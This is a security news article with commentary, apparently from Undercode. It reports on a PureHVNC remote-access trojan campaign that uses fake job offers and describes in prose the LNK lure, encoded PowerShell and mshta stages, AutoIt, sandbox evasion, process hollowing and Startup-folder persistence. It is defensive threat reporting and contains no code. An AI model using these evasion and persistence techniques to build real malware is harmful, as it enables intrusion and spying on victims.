Cybercriminals Deploy PureHVNC RAT in Elaborate Job Scam Campaigns

Cyber attackers are stepping up their game, blending advanced malware with convincing social engineering tactics to fool even the most cautious users. A new campaign discovered by Netskope Threat Labs shows how hackers are using fake job offers, complex scripting, and stealthy malware known as PureHVNC to gain remote control over victims’ systems.

This wave of cyberattacks is particularly dangerous due to its multi-layered structure, reliance on legitimate system tools, and a highly evasive approach that makes detection incredibly difficult. From fake job listings to weaponized PowerShell scripts and advanced persistence mechanisms, the threat actors behind this campaign are employing a full arsenal of modern hacking techniques.

Stealthy Malware Hides Behind Fake Job Offers: A Full Breakdown

Security experts have uncovered a well-coordinated cyber campaign that uses the PureHVNC Remote Access Trojan (RAT) alongside fake job offers to target unsuspecting individuals. The infection chain begins with phishing emails or rogue downloads disguised as job opportunities from high-profile brands in industries like fashion, fragrance, and jewelry.

Once a victim opens the disguised file—typically an .LNK file masquerading as a PDF—an embedded PowerShell script runs quietly in the background. This script is encoded in Base64 and uses Windows tools like Set-Clipboard and IEX (Invoke-Expression) to retrieve and execute a remote HTML Application (HTA) file via mshta.exe.

The attackers don’t stop there. They implement several scripting languages including JavaScript, AutoIt, and more PowerShell to layer the infection and maintain persistence. To further avoid detection, the malicious files are hidden inside what appear to be large MP4 video files loaded with useless data, obscuring the JavaScript payloads within.

AutoIt, a legitimate Windows automation tool, plays a crucial role. It helps in executing more obfuscated scripts and deploying additional components like Guard.exe, which are then embedded deeper into the system through cleverly designed startup routines. These routines ensure the malware reactivates each time the computer is rebooted.

The attackers have also taken significant steps to avoid detection. Their scripts run several checks to identify virtual machines, sandbox environments, or antivirus software. If found, the scripts either stop execution or adjust behavior to slip under the radar.

One of the most alarming aspects is the use of process hollowing, a technique where a legitimate system process is launched in a suspended state, then replaced with malicious code. This makes the malware blend seamlessly into normal system activity. Once deployed, the final payload decrypts and loads the PureHVNC RAT, a tool that gives hackers full remote access to the system, allowing them to upload and download files, spy on users, and even deploy more malware.

Researchers highlight the highly modular nature of the PureHVNC tool, which allows attackers to modify and update it frequently, making it especially resilient to traditional antivirus or endpoint protection solutions. Its stealth, persistence, and adaptability make this one of the most complex malware campaigns seen in recent months.

What Undercode Say:

This campaign is a perfect example of how cybercrime is no longer limited to brute-force hacks or spam emails. It’s evolved into a psychological and technical game of chess. Attackers are no longer relying solely on the weaknesses of systems, but rather, the vulnerabilities of human behavior.

Let’s begin with the lure: job offers. In an era where remote work is booming and layoffs are frequent, this social engineering angle hits a sensitive nerve. A fake offer from a known fashion or perfume brand carries both appeal and credibility—making it dangerously effective.

The infection chain itself reveals a deep understanding of both system internals and user psychology. Using .LNK files that mimic PDFs is not a new trick, but still highly effective. Most users don’t look at file extensions carefully, especially when they’re expecting a document.

PowerShell remains a favorite among attackers for good reason: it’s native to Windows, powerful, and often overlooked by traditional antivirus software. But it’s not just about PowerShell—the use of AutoIt, mshta.exe, and even process hollowing paints a picture of a well-funded, professional group.

Obfuscation techniques, such as disguising malware as bloated MP4 files, show the level of effort put into bypassing content scanning and heuristic-based detection. Similarly, embedding scripts within HTML and using eval() for execution adds another layer of stealth, making reverse engineering and analysis far more challenging.

The persistence mechanisms employed—placing shortcuts in the Windows Startup directory—demonstrate the attackers’ intent to maintain long-term access. Once infected, the victim isn’t just compromised for a moment, but indefinitely.

Perhaps the most alarming part is the adaptability. By using environmental checks, the malware alters its behavior depending on where it’s running. This is a key marker of modern malware sophistication. It’s also a sign that this is not a one-off attack, but part of a larger, evolving threat landscape.

From a defense perspective, this campaign underscores the need for layered security. Relying solely on signature-based antivirus is no longer sufficient. Behavioral analysis, endpoint detection and response (EDR), and user education must all work together to build a resilient defense.

Organizations should also be aware that even legitimate automation tools like AutoIt can be weaponized. Every executable, every script should be monitored, especially those behaving in ways inconsistent with their purpose.

Fact Checker Results ✅

The techniques described are consistent with known PureHVNC RAT behavior.
Obfuscation methods like process hollowing and environmental checks are widely used by advanced threat actors.
Social engineering tactics using job offers have increased significantly since 2023. 📈💻⚠️

Prediction:

As this campaign shows, PureHVNC is not just another RAT. Its modular structure, stealth features, and adaptability signal an emerging trend: next-generation malware that blends technical precision with psychological manipulation. Expect future campaigns to adopt similar tactics, possibly moving beyond job scams into dating apps, freelance platforms, and social media. The goal will remain the same—gain trust, bypass defenses, and stay undetected for as long as possible.